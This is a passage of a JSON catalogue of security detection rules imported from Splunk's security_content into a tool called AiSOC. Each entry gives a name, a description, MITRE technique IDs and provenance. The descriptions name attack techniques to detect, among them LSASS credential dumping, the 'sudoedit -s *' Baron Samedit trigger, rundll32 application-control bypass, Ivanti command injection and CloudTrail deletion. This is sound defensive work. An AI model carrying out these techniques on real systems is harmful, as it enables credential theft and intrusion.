"https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_azurehound_file_modifications.yml" } }, { "id": "splunk-security-content-1c6abb08-73d1-11ec-9ca0-acde48001122", "type": "detection", "name": "Windows Hunting System Account Targeting Lsass", "description": "The following analytic identifies processes attempting to access Lsass.exe, which may indicate credential dumping or applications needing credential access. It leverages Sysmon EventCode 10 to detect such activities by analyzing fields like TargetImage, GrantedAccess, and SourceImage. This behavior is significant as unauthorized access to Lsass.exe can lead to credential theft, posing a severe security risk. If confirmed malicious, attackers could gain access to sensitive credentials, potentially leading to privilege escalation and further compromise of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-hunting-system-account-targeting-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1c6abb08-73d1-11ec-9ca0-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_hunting_system_account_targeting_lsass.yml" } }, { "id": "splunk-security-content-1cb40e15-cffa-45cc-abbd-e35884a49766", "type": "detection", "name": "Windows Spearphishing Attachment Connect To None MS Office Domain", "description": "The following analytic identifies suspicious Office documents that connect to non-Microsoft Office domains. It leverages Sysmon EventCode 22 to detect processes like winword.exe or excel.exe making DNS queries to domains outside of *.office.com or *.office.net. This activity is significant as it may indicate a spearphishing attempt using malicious documents to download or connect to harmful content. If confirmed malicious, this could lead to unauthorized data access, malware infection, or further network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-spearphishing-attachment-connect-to-none-ms-office-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1cb40e15-cffa-45cc-abbd-e35884a49766", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/windows_spearphishing_attachment_connect_to_none_ms_office_domain.yml" } }, { "id": "splunk-security-content-1cbcf75f-0e45-4f29-8c1b-7fcd7e55cc55", "type": "detection", "name": "Cisco NVM - Suspicious Network Connection Initiated via MsXsl", "description": "This analytic identifies the use of `msxsl.exe` initiating a network connection to a non-private IP address.\nAlthough `msxsl.exe` is a legitimate Microsoft utility used to apply XSLT transformations, adversaries can abuse it\nto execute arbitrary code or load external resources in an evasive manner.\nThis detection leverages Cisco NVM telemetry to identify potentially malicious use of `msxsl.exe` making network connections\nthat may indicate command and control (C2) or data exfiltration activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1220" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-suspicious-network-connection-initiated-via-msxsl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1cbcf75f-0e45-4f29-8c1b-7fcd7e55cc55", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___suspicious_network_connection_initiated_via_msxsl.yml" } }, { "id": "splunk-security-content-1cd983c8-8fd6-11ec-a09d-acde48001122", "type": "detection", "name": "Windows Disable Notification Center", "description": "The following analytic detects the modification of the Windows registry to disable the Notification Center on a host machine. It leverages data from the Endpoint.Registry data model, specifically looking for changes to the \"DisableNotificationCenter\" registry value set to \"0x00000001.\" This activity is significant because disabling the Notification Center can be a tactic used by RAT malware to hide its presence and subsequent actions. If confirmed malicious, this could allow an attacker to operate stealthily, potentially leading to further system compromise and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disable-notification-center.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1cd983c8-8fd6-11ec-a09d-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disable_notification_center.yml" } }, { "id": "splunk-security-content-1cefb270-74a5-4e27-aa0c-2b6fa7c5b4ed", "type": "detection", "name": "Linux Kworker Process In Writable Process Path", "description": "The following analytic detects the execution of a kworker process with a command line in writable directories such as /home/, /var/log, and /tmp on a Linux machine. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process paths. This activity is significant as kworker processes are typically kernel threads, and their presence in writable directories is unusual and indicative of potential malware, such as CyclopsBlink. If confirmed malicious, this could allow attackers to blend malicious processes with legitimate ones, leading to persistent access and further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-kworker-process-in-writable-process-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1cefb270-74a5-4e27-aa0c-2b6fa7c5b4ed", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_kworker_process_in_writable_process_path.yml" } }, { "id": "splunk-security-content-1cfab663-9adc-4169-a88c-6bae29ba3c70", "type": "detection", "name": "Ollama Excessive API Requests", "description": "Detects potential Distributed Denial of Service (DDoS) attacks or rate limit abuse against Ollama API endpoints by identifying excessive request volumes from individual client IP addresses. This detection monitors GIN-formatted Ollama server logs to identify clients generating abnormally high request rates within short time windows, which may indicate automated attacks, botnet activity, or resource exhaustion attempts targeting local AI model infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1498" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ollama-excessive-api-requests.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1cfab663-9adc-4169-a88c-6bae29ba3c70", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/ollama_excessive_api_requests.yml" } }, { "id": "splunk-security-content-1d19037f-466e-4d56-8d87-36fafd9aa3ce", "type": "detection", "name": "Linux Puppet Privilege Escalation", "description": "The following analytic detects the execution of Puppet commands with elevated privileges, specifically when Puppet is used to apply configurations with sudo rights. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant because it indicates a potential privilege escalation attempt, where a user could gain root access and execute system commands as the root user. If confirmed malicious, this could allow an attacker to fully compromise the system, execute arbitrary commands, and maintain persistent control.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-puppet-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1d19037f-466e-4d56-8d87-36fafd9aa3ce", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_puppet_privilege_escalation.yml" } }, { "id": "splunk-security-content-1d192a47-4bd3-4c06-902d-5dbe2375ec6d", "type": "detection", "name": "Cisco SD-WAN - Peering Activity", "description": "This analytic detects Cisco SD-WAN `control-connection-state-change` events where a control connection transitions.\nIt extracts and highlights key triage fields including `peer-type`, `peer-system-ip`, `public-ip`, and `public-port`.\nAnalysts should manually validate whether the `peer-system-ip` matches the expected SD-WAN addressing schema and\ndevice inventory, whether the event timing aligns with known operational activity (maintenance, failover, or\nplanned changes), and whether the `public-ip` is an expected source for control peering in the environment.\nTreat `peer-type:vmanage` events with higher scrutiny, especially when peer or source IP values are previously\nunseen.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-sd-wan-peering-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1d192a47-4bd3-4c06-902d-5dbe2375ec6d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_sd_wan___peering_activity.yml" } }, { "id": "splunk-security-content-1d38e5e9-2ff8-4c47-872c-bf1657cefab5", "type": "detection", "name": "Windows Svchost.exe Parent Process Anomaly", "description": "The following analytic detects an anomaly where an svchost.exe process is spawned by a parent process other than the standard services.exe. In a typical Windows environment, svchost.exe is a system process that hosts Windows service DLLs, and is expected to be a child of services.exe. A process deviation from this hierarchy may indicate suspicious behavior, such as malicious code attempting to masquerade as a legitimate system process or evade detection. It is essential to investigate the parent process and associated behavior for further signs of compromise or unauthorized activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.009" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-svchost-exe-parent-process-anomaly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1d38e5e9-2ff8-4c47-872c-bf1657cefab5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_svchost_exe_parent_process_anomaly.yml" } }, { "id": "splunk-security-content-1dda7586-57be-4a1b-8de1-a9ad802b9a7f", "type": "detection", "name": "Windows Vulnerable Driver Installed", "description": "The following analytic detects the loading of known vulnerable Windows drivers, which may indicate potential persistence or privilege escalation attempts. It leverages Windows System service install EventCode 7045 to identify driver loading events and cross-references them with a list of vulnerable drivers. This activity is significant as attackers often exploit vulnerable drivers to gain elevated privileges or maintain persistence on a system. If confirmed malicious, this could allow attackers to execute arbitrary code with high privileges, leading to further system compromise and potential data exfiltration. This detection is a Windows Event Log adaptation of the Sysmon driver loaded detection written by Michael Haag.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-vulnerable-driver-installed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1dda7586-57be-4a1b-8de1-a9ad802b9a7f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_vulnerable_driver_installed.yml" } }, { "id": "splunk-security-content-1de31d5d-8fa6-4ee0-af89-17069134118a", "type": "detection", "name": "Detect Baron Samedit CVE-2021-3156 via OSQuery", "description": "The following analytic detects the execution of the \"sudoedit -s *\" command, which is associated with the Baron Samedit CVE-2021-3156 heap-based buffer overflow vulnerability. This detection leverages the `osquery_process` data source to identify instances where this specific command is run. This activity is significant because it indicates an attempt to exploit a known vulnerability that allows privilege escalation. If confirmed malicious, an attacker could gain full control of the system, execute arbitrary code, or access sensitive data, leading to potential data breaches and system disruptions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/detect-baron-samedit-cve-2021-3156-via-osquery.yaml", "provenance": { "source": "splunk/security_content", "source_id": "1de31d5d-8fa6-4ee0-af89-17069134118a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_baron_samedit_cve_2021_3156_via_osquery.yml" } }, { "id": "splunk-security-content-1e1dedc6-f6f3-41a0-9dd7-a1245904fe75", "type": "detection", "name": "Windows Process Injection into Commonly Abused Processes", "description": "The following analytic detects process injection into executables that are commonly abused using Sysmon EventCode 10. It identifies suspicious GrantedAccess requests (0x40 and 0x1fffff) to processes such as notepad.exe, wordpad.exe and calc.exe, excluding common system paths like System32, Syswow64, and Program Files. This behavior is often associated with the SliverC2 framework by BishopFox. Monitoring this activity is crucial as it may indicate an initial payload attempting to execute malicious code. If confirmed malicious, this could allow attackers to execute arbitrary code, potentially leading to privilege escalation or persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-injection-into-commonly-abused-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1e1dedc6-f6f3-41a0-9dd7-a1245904fe75", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_injection_into_commonly_abused_processes.yml" } }, { "id": "splunk-security-content-1e45e6a8-110b-4886-b815-8d69cf35bf0a", "type": "detection", "name": "HTTP Request to Reserved Name on IIS Server", "description": "Detects attempts to exploit a request smuggling technique against IIS that leverages a Windows quirk where requests for reserved Windows device names such as \"/con\" trigger an early server response before the request body is received.\nWhen combined with a Content-Length desynchronization, this behavior can lead to a parsing confusion between frontend and backend.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/http-request-to-reserved-name-on-iis-server.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1e45e6a8-110b-4886-b815-8d69cf35bf0a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/http_request_to_reserved_name_on_iis_server.yml" } }, { "id": "splunk-security-content-1ecff169-26d7-4161-9a7b-2ac4c8e61bea", "type": "detection", "name": "Azure Active Directory High Risk Sign-in", "description": "The following analytic detects high-risk sign-in attempts against Azure Active Directory, identified by Azure Identity Protection. It leverages the RiskyUsers and UserRiskEvents log categories from Azure AD events ingested via EventHub. This activity is significant as it indicates potentially compromised accounts, flagged by heuristics and machine learning. If confirmed malicious, attackers could gain unauthorized access to sensitive resources, leading to data breaches or further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-active-directory-high-risk-sign-in.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1ecff169-26d7-4161-9a7b-2ac4c8e61bea", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_active_directory_high_risk_sign_in.yml" } }, { "id": "splunk-security-content-1ef5dab0-e1f1-495d-a272-d134583c10b1", "type": "detection", "name": "Windows Application Whitelisting Bypass Attempt via Rundll32", "description": "The following analytic detects the execution of rundll32.exe calling one of the following DLLs:\n\n- Advpack.dll\n- Ieadvpack.dll\n- Syssetup.dll\n- Setupapi.dll\n\nwith one of the following functions: \"LaunchINFSection\", \"InstallHinfSection\", \"SetupInfObjectInstallAction\".\nThis method is identified through Endpoint Detection and Response (EDR) telemetry,\nfocusing on command-line executions and process details.\nThis activity is significant as it indicates a potential application\ncontrol or whitelisting bypass, allowing script code execution from a file.\nIf confirmed malicious, an attacker could execute arbitrary code, potentially leading to privilege escalation,\npersistence, or further network compromise.\nInvestigate the script content, network connections, and any spawned child processes for further context.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-application-whitelisting-bypass-attempt-via-rundll32.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1ef5dab0-e1f1-495d-a272-d134583c10b1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_application_whitelisting_bypass_attempt_via_rundll32.yml" } }, { "id": "splunk-security-content-1f0b47e5-0134-43eb-851c-e3258638945e", "type": "detection", "name": "ASL AWS Defense Evasion Delete Cloudtrail", "description": "The following analytic detects AWS `DeleteTrail` events within CloudTrail logs. It leverages Amazon Security Lake logs parsed in the Open Cybersecurity Schema Framework (OCSF) format to identify when a CloudTrail is deleted. This activity is significant because adversaries may delete CloudTrail logs to evade detection and operate with stealth. If confirmed malicious, this action could allow attackers to cover their tracks, making it difficult to trace their activities and investigate other potential compromises within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-defense-evasion-delete-cloudtrail.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1f0b47e5-0134-43eb-851c-e3258638945e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_defense_evasion_delete_cloudtrail.yml" } }, { "id": "splunk-security-content-1f32a7e0-a060-4545-b7de-73fcf9ad536e", "type": "detection", "name": "Ivanti Connect Secure Command Injection Attempts", "description": "The following analytic identifies attempts to exploit the CVE-2023-46805 and CVE-2024-21887 vulnerabilities in Ivanti Connect Secure. It detects POST requests to specific URIs that leverage command injection to execute arbitrary commands. The detection uses the Web datamodel to monitor for these requests and checks for a 200 OK response, indicating a successful exploit attempt. This activity is significant as it can lead to unauthorized command execution on the server. If confirmed malicious, attackers could gain control over the system, leading to potential data breaches or further network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ivanti-connect-secure-command-injection-attempts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1f32a7e0-a060-4545-b7de-73fcf9ad536e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/ivanti_connect_secure_command_injection_attempts.yml" } }, { "id": "splunk-security-content-1f35e1da-267b-11ec-90a9-acde48001122", "type": "detection", "name": "Wscript Or Cscript Suspicious Child Process", "description": "This analytic identifies a suspicious spawned process by WScript or CScript process. This technique was a common technique used by adversaries and malware to execute different LOLBIN, other scripts like PowerShell or spawn a suspended process to inject its code as a defense evasion. This TTP may detect some normal script that uses several application tools that are in the list of the child process it detects but a good pivot and indicator that a script may execute suspicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055", "T1134.004", "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wscript-or-cscript-suspicious-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1f35e1da-267b-11ec-90a9-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wscript_or_cscript_suspicious_child_process.yml" } }, { "id": "splunk-security-content-1f44c126-c26a-4dd3-83bb-0f9a0f03ecc3", "type": "detection", "name": "Windows Scheduled Task with Suspicious Command", "description": "The following analytic detects the creation of scheduled tasks designed to execute commands using native Windows shells like PowerShell, Cmd, Wscript, or Cscript or from public folders such as Users, Temp, or ProgramData. It leverages Windows Security EventCode 4698, 4700, and 4702 to identify when such tasks are registered, enabled, or modified. This activity is significant as it may indicate an attempt to establish persistence or execute malicious commands on a system. If confirmed malicious, this could allow an attacker to maintain access, execute arbitrary code, or escalate privileges, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-scheduled-task-with-suspicious-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1f44c126-c26a-4dd3-83bb-0f9a0f03ecc3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_scheduled_task_with_suspicious_command.yml" } }, { "id": "splunk-security-content-1f57f10e-1dc5-47ea-852c-2e85b2503d79", "type": "detection", "name": "Cisco Secure Firewall - Repeated Blocked Connections", "description": "The following analytic detects repeated blocked connection attempts from the same initiator to the same responder within a short time window. It leverages Cisco Secure Firewall Threat Defense logs and identifies connections where the action is set to Block, and the number of occurrences reaches or exceeds a threshold of ten within a one-minute span. This pattern may indicate a misconfigured application, unauthorized access attempts, or early stages of a brute-force or scanning operation. If confirmed malicious, this behavior may represent an attacker probing the network, attempting lateral movement, or testing firewall rules for weaknesses.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018", "T1046", "T1110", "T1203", "T1595.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-repeated-blocked-connections.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1f57f10e-1dc5-47ea-852c-2e85b2503d79", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___repeated_blocked_connections.yml" } }, { "id": "splunk-security-content-1f5b68aa-2037-11ec-898e-acde48001122", "type": "detection", "name": "Print Processor Registry Autostart", "description": "The following analytic detects suspicious modifications or new entries in the Print Processor registry path. It leverages registry activity data from the Endpoint data model to identify changes in the specified registry path. This activity is significant because the Print Processor registry is known to be exploited by APT groups like Turla for persistence and privilege escalation. If confirmed malicious, this could allow an attacker to execute a malicious DLL payload by restarting the spoolsv.exe process, leading to potential control over the compromised machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/print-processor-registry-autostart.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1f5b68aa-2037-11ec-898e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/print_processor_registry_autostart.yml" } }, { "id": "splunk-security-content-1f77661a-0fe3-4b8d-a62c-7dff06906d26", "type": "detection", "name": "Windows Suspicious VMWare Tools Child Process", "description": "The following analytic identifies child processes spawned by vmtoolsd.exe, the VMWare Tools service in Windows, which typically runs with SYSTEM privileges. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process relationships. Monitoring this activity is crucial as it can indicate exploitation attempts, such as CVE-2023-20867. If confirmed malicious, attackers could gain SYSTEM-level access, allowing them to execute arbitrary code, escalate privileges, and potentially compromise the entire system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-suspicious-vmware-tools-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1f77661a-0fe3-4b8d-a62c-7dff06906d26", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_suspicious_vmware_tools_child_process.yml" } }, { "id": "splunk-security-content-1fca2b28-f922-11eb-b2dd-acde48001122", "type": "detection", "name": "Uninstall App Using MsiExec", "description": "The following analytic detects the uninstallation of applications using msiexec with specific command-line arguments. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant because it is an uncommon practice in enterprise environments and has been associated with malicious behavior, such as disabling antivirus software. If confirmed malicious, this could allow an attacker to remove security software, potentially leading to further compromise and persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/uninstall-app-using-msiexec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1fca2b28-f922-11eb-b2dd-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/uninstall_app_using_msiexec.yml" } }, { "id": "splunk-security-content-1fdd164a-def8-4762-83a9-9ffe24e74d5a", "type": "detection", "name": "AWS Excessive Security Scanning", "description": "The following analytic identifies excessive security scanning activities in AWS by detecting a high number of Describe, List, or Get API calls from a single user. It leverages AWS CloudTrail logs to count distinct event names and flags users with more than 50 such events. This behavior is significant as it may indicate reconnaissance activities by an attacker attempting to map out your AWS environment. If confirmed malicious, this could lead to unauthorized access, data exfiltration, or further exploitation of your cloud infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1526" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-excessive-security-scanning.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1fdd164a-def8-4762-83a9-9ffe24e74d5a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": 